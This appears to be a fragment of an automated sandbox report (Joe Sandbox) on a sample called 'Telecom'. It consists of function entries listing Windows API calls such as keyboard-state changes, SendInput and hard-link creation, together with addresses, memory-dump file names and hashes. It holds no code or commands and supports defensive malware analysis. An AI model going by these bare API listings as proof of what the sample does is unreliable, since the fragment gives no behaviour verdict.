                                                      • Instruction ID: e1772c2eb1cb7dd158324f9f3a04b21ab46ba17d53fc660dc3470972cc706426
                                                      • Opcode Fuzzy Hash: 165701125adae535267ef3a2d35ac0128c8a5441298212ce96370536511dd00b
                                                      • Instruction Fuzzy Hash: 2C41C478A00200AFE721AF25C886F2A7795EB04758F54C45EF9158F3D3D7B6ED428B94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 004D6D1A
                                                      • ScreenToClient.USER32(?,?), ref: 004D6D4D
                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 004D6DBA
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientMoveRectScreen
                                                      • String ID:
                                                      • API String ID: 3880355969-0
                                                      • Opcode ID: 31d34fa976d7d2499a2634cc73209fb0366e392dfd0ec78f54e5682a0daebc08
                                                      • Instruction ID: e69214812afb1191e7033db3bbddd1022e53f0fef3c08b0599631076838ff6aa
                                                      • Opcode Fuzzy Hash: 31d34fa976d7d2499a2634cc73209fb0366e392dfd0ec78f54e5682a0daebc08
                                                      • Instruction Fuzzy Hash: 5B513A34A00209AFCF24DF68D890AAE7BB6FB54320F11815BF9159B390D734AD81CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 004B61C8
                                                      • GetLastError.KERNEL32(?,00000000), ref: 004B61EE
                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 004B6213
                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 004B623F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3321077145-0
                                                      • Opcode ID: ede3bd96a70ba814252d124254c96402fb70467593aab3cb1471642f984a3f6e
                                                      • Instruction ID: c99cc9a97d6820673859ba7cc3975c49a665529810ad07922947369debbbaa92
                                                      • Opcode Fuzzy Hash: ede3bd96a70ba814252d124254c96402fb70467593aab3cb1471642f984a3f6e
                                                      • Instruction Fuzzy Hash: C3415E35600610DFDB10EF16C545A5EB7E2FF99314B19848EE84A9B362CB38FC01CB99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 004AB473
                                                      • SetKeyboardState.USER32(00000080), ref: 004AB48F
                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 004AB4FD
                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 004AB54F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: aae662c8b62fcbf1016bafcba9d09307e64d7b32cbaaea8d0e4b26faae5b7ed4
                                                      • Instruction ID: 756971e50eba30cb492d486f1b83c99b0d3b688fd98fd64b8801b50f62fb6baf
                                                      • Opcode Fuzzy Hash: aae662c8b62fcbf1016bafcba9d09307e64d7b32cbaaea8d0e4b26faae5b7ed4
                                                      • Instruction Fuzzy Hash: 24312670E406086EFB318A259C057FB7BB5EB6B314F04821BE095562D3C37D898287EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 004AB5B8
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 004AB5D4
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 004AB63B
                                                      • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 004AB68D
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: ad8888d60643193f7d09808dc23d7d007d253c924cd3fe385195544afd6aac94
                                                      • Instruction ID: 992073f5bee965a6c129388a2e2a0ead7af47ca19e69e3de058a0fcf3992d873
                                                      • Opcode Fuzzy Hash: ad8888d60643193f7d09808dc23d7d007d253c924cd3fe385195544afd6aac94
                                                      • Instruction Fuzzy Hash: C031EB30D406486EFF248B6588057FB7BA6FFA6314F04822BE485562D2C77C89568BDB
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 004D80D4
                                                      • GetWindowRect.USER32(?,?), ref: 004D814A
                                                      • PtInRect.USER32(?,?,?), ref: 004D815A
                                                      • MessageBeep.USER32(00000000), ref: 004D81C6
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: 9aae4a073fafa7fd8b3d8df1120bc346ebacefed721799850d0eabb658185193
                                                      • Instruction ID: c8304d031d10a33d21017e3234465dcfe3ddda9d7bdce936372fb94af79ccbd4
                                                      • Opcode Fuzzy Hash: 9aae4a073fafa7fd8b3d8df1120bc346ebacefed721799850d0eabb658185193
                                                      • Instruction Fuzzy Hash: 23419F30A01215DFCB11DF58C8A0AAEB7F5FB59314F1480AFE9549B365CB38E84ACB44
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 004D2187
                                                        • Part of subcall function 004A4393: GetWindowThreadProcessId.USER32(?,00000000), ref: 004A43AD
                                                        • Part of subcall function 004A4393: GetCurrentThreadId.KERNEL32 ref: 004A43B4
                                                        • Part of subcall function 004A4393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004A2F00), ref: 004A43BB
                                                      • GetCaretPos.USER32(?), ref: 004D219B
                                                      • ClientToScreen.USER32(00000000,?), ref: 004D21E8
                                                      • GetForegroundWindow.USER32 ref: 004D21EE
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: ef87faf8d36c6736b374fb2279ca592d13589834958fc3bcd6a992c61b9eb45f
                                                      • Instruction ID: afa43cdb769eb89be7157d97d742c3a1c3249da6a6038a9bdac6b545a36b52bb
                                                      • Opcode Fuzzy Hash: ef87faf8d36c6736b374fb2279ca592d13589834958fc3bcd6a992c61b9eb45f
                                                      • Instruction Fuzzy Hash: 05313271D01109AFDB04EFA6C9818AEB7F8EF98308B5084AFE415E7311D6759E45CBA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004441EA: _wcslen.LIBCMT ref: 004441EF
                                                      • _wcslen.LIBCMT ref: 004AE8E2
                                                      • _wcslen.LIBCMT ref: 004AE8F9
                                                      • _wcslen.LIBCMT ref: 004AE924
                                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 004AE92F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$ExtentPoint32Text
                                                      • String ID:
                                                      • API String ID: 3763101759-0
                                                      • Opcode ID: 1d95114d3ad9d81702659367af971569f7a84288cab16cb1221010521d455718
                                                      • Instruction ID: 0e2843db06927288e1878037541983035d323fa5a4848882440b8684f1d82d39
                                                      • Opcode Fuzzy Hash: 1d95114d3ad9d81702659367af971569f7a84288cab16cb1221010521d455718
                                                      • Instruction Fuzzy Hash: 8A21D871D00214AFDB10AFA5C981BAFB7B8EF96354F10406AE814AB341E6789E41C7A9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 004D32A6
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004D32C0
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004D32CE
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 004D32DC
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$AttributesLayered
                                                      • String ID:
                                                      • API String ID: 2169480361-0
                                                      • Opcode ID: f480c178f78c4bdf62a488006f556b37875a2cde711b55900210c2d0c5032540
                                                      • Instruction ID: 0f2e2321379e71721f03a126de775686514f2dc2558203a23bed82a7242dc52f
                                                      • Opcode Fuzzy Hash: f480c178f78c4bdf62a488006f556b37875a2cde711b55900210c2d0c5032540
                                                      • Instruction Fuzzy Hash: 3C21F331A05111AFD7009F14C865F6A7755AF41319F14829FF4268B392C779ED41C7D9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 004A96E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,004A8271,?,000000FF,?,004A90BB,00000000,?,0000001C,?,?), ref: 004A96F3
                                                        • Part of subcall function 004A96E4: lstrcpyW.KERNEL32(00000000,?), ref: 004A9719
                                                        • Part of subcall function 004A96E4: lstrcmpiW.KERNEL32(00000000,?,004A8271,?,000000FF,?,004A90BB,00000000,?,0000001C,?,?), ref: 004A974A
                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,004A90BB,00000000,?,0000001C,?,?,00000000), ref: 004A828A
                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 004A82B0
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,004A90BB,00000000,?,0000001C,?,?,00000000), ref: 004A82EB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      • API String ID: 4031866154-3896280584
                                                      • Opcode ID: 6f7de106360283181a2309cfb2e795e115753017e82dfa53b7e3289de5fc164d
                                                      • Instruction ID: c7b095465463838994006b9e3140b3a077b37d8657226b073f53c685fec828e0
                                                      • Opcode Fuzzy Hash: 6f7de106360283181a2309cfb2e795e115753017e82dfa53b7e3289de5fc164d
                                                      • Instruction Fuzzy Hash: 8211B17A200242ABCB149F39D845A7B77A9FF5A754B50402FF942C7290EF369811C799
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 004D615A
                                                      • _wcslen.LIBCMT ref: 004D616C
                                                      • _wcslen.LIBCMT ref: 004D6177
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 004D62B5
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend_wcslen
                                                      • String ID:
                                                      • API String ID: 455545452-0
                                                      • Opcode ID: 497014fb5683ed1faf3dbdc3309ca4aea9b4afa3e78cbcbfa7afe63b77d37752
                                                      • Instruction ID: b6be9a1c42a9fb629fd342f55b7a753c2ad476f25d7f28c2ac073fc2a6b4bcac
                                                      • Opcode Fuzzy Hash: 497014fb5683ed1faf3dbdc3309ca4aea9b4afa3e78cbcbfa7afe63b77d37752
                                                      • Instruction Fuzzy Hash: A011D335500208A6EF10DFA58C94AEF77BCEB11354F10412BF911D6382EB78C945DB69
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 76445e723f028f7b09d110ace7de2bbaa78a0b1120c983dd4081395113d2e651
                                                      • Instruction ID: 96f975c31c735aed66156c55f83d166bd3cb21b6939f8140e6b587a3323c7f04
                                                      • Opcode Fuzzy Hash: 76445e723f028f7b09d110ace7de2bbaa78a0b1120c983dd4081395113d2e651
                                                      • Instruction Fuzzy Hash: 8E01A2B2A052567FF62126797DC1FA7670DDF413B8B30C32BF629A12D1DEA88C419178
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 004A2394
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004A23A6
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004A23BC
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004A23D7
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 38c2879086be66e1ae8ee268f656b1b5b94849834cc1ceb613eaa269e844afea
                                                      • Instruction ID: 0d25bd3939f21db1295467000f4a7fda18c3c839db3e3a771d2ece22439f1728
                                                      • Opcode Fuzzy Hash: 38c2879086be66e1ae8ee268f656b1b5b94849834cc1ceb613eaa269e844afea
                                                      • Instruction Fuzzy Hash: 7F110C36901218FFDF119BA9CD85F9EBBB8FB09750F200096EA01B7290D6756E11EB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 004AEB14
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 004AEB47
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 004AEB5D
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004AEB64
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 2880819207-0
                                                      • Opcode ID: bc90e06c929f59abeb6dfceb442f5c95fb5d09e9083e66a8db50ca00226c8de2
                                                      • Instruction ID: 976dca487cba6b8f450a0ae821002616ac351a67dd4fde11c24a645ab471b341
                                                      • Opcode Fuzzy Hash: bc90e06c929f59abeb6dfceb442f5c95fb5d09e9083e66a8db50ca00226c8de2
                                                      • Instruction Fuzzy Hash: 371108B2D00218BBCB019BA99C09ADF7FACEB56310F108227F835D3290D678990487B5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,?,0046D369,00000000,00000004,00000000), ref: 0046D588
                                                      • GetLastError.KERNEL32 ref: 0046D594
                                                      • __dosmaperr.LIBCMT ref: 0046D59B
                                                      • ResumeThread.KERNEL32(00000000), ref: 0046D5B9
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                      • String ID:
                                                      • API String ID: 173952441-0
                                                      • Opcode ID: e4d7da0199cf14bef9ec069c9d575f4ce711225c6afcdf42ddbbabf55865533e
                                                      • Instruction ID: 8245859d0250f256e94d704d6e72118bccbafbd3b529951577b232ed7d008ca5
                                                      • Opcode Fuzzy Hash: e4d7da0199cf14bef9ec069c9d575f4ce711225c6afcdf42ddbbabf55865533e
                                                      • Instruction Fuzzy Hash: 6301DB32E01114BBCB106F66DC05BAB7B58EF41338F10021BF925861D0EF749801C6AB
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0047338D,00000364,00000000,00000000,00000000,?,004735FE,00000006,FlsSetValue), ref: 00473418
                                                      • GetLastError.KERNEL32(?,0047338D,00000364,00000000,00000000,00000000,?,004735FE,00000006,FlsSetValue,004E3260,FlsSetValue,00000000,00000364,?,004731B9), ref: 00473424
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0047338D,00000364,00000000,00000000,00000000,?,004735FE,00000006,FlsSetValue,004E3260,FlsSetValue,00000000), ref: 00473432
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: e103f83ccdd90b25a504b68e8ee40cbde41694f57e01d3051595d2c1fbc7617e
                                                      • Instruction ID: f64e7ed9515725917083b5639ff9016ec6465a3dc040d059a6b7127dd5e75076
                                                      • Opcode Fuzzy Hash: e103f83ccdd90b25a504b68e8ee40cbde41694f57e01d3051595d2c1fbc7617e
                                                      • Instruction Fuzzy Hash: AC01FC32A52222ABCB364F79DC449D73B58BF05B627218632F90EE7241C724DD02D6EC
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 004D888E
                                                      • ScreenToClient.USER32(?,?), ref: 004D88A6
                                                      • ScreenToClient.USER32(?,?), ref: 004D88CA
                                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004D88E5
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2437542388.0000000000441000.00000020.00000001.01000000.00000006.sdmp, Offset: 00440000, based on PE: true
                                                      • Associated: 0000000B.00000002.2437388055.0000000000440000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.00000000004DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438406564.000000000050D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.2438570425.0000000000515000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_440000_Telecom.jbxd
                                                      Similarity
                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                      • String ID:
                                                      • API String ID: 357397906-0
                                                      • Opcode ID: 41220b8e88e3462d738ebbad1972a82755292e1e57271fd981418bffb838891b
                                                      • Instruction ID: 8724eae0699a996b07a2578ed13fe35216ca59aeb7b454d1686705eef9a449a3
                                                      • Opcode Fuzzy Hash: 41220b8e88e3462d738ebbad1972a82755292e1e57271fd981418bffb838891b
                                                      • Instruction Fuzzy Hash: 8A1142B9D01209EFDB41DFA8C884AEEBBF5FB08310F508166E915E3610D735AA54DF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
